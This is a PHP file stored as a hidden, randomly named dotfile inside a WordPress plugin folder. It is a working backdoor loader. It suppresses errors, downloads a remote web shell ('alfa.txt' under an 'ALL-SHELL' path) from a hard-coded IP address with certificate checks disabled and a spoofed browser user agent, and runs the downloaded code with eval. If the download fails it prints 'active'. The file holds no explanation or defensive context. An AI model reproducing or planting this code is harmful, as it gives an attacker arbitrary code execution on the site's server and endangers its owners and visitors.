File: /var/www/html/wp-content/plugins/effybgl/.7878347347384BSS.php
<?php
/* direct */
@error_reporting(0);
@ini_set('display_errors', 0);
$url = 'http://185.128.227.157/ALL-SHELL/raw-ker/alfa.txt';
if(function_exists('curl_init')){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$res = curl_exec($ch);
curl_close($ch);
if($res && strlen($res) > 10){
$res = ltrim($res, "\xef\xbb\xbf");
@eval('?>' . $res);
exit;
}
}
echo "active";
?>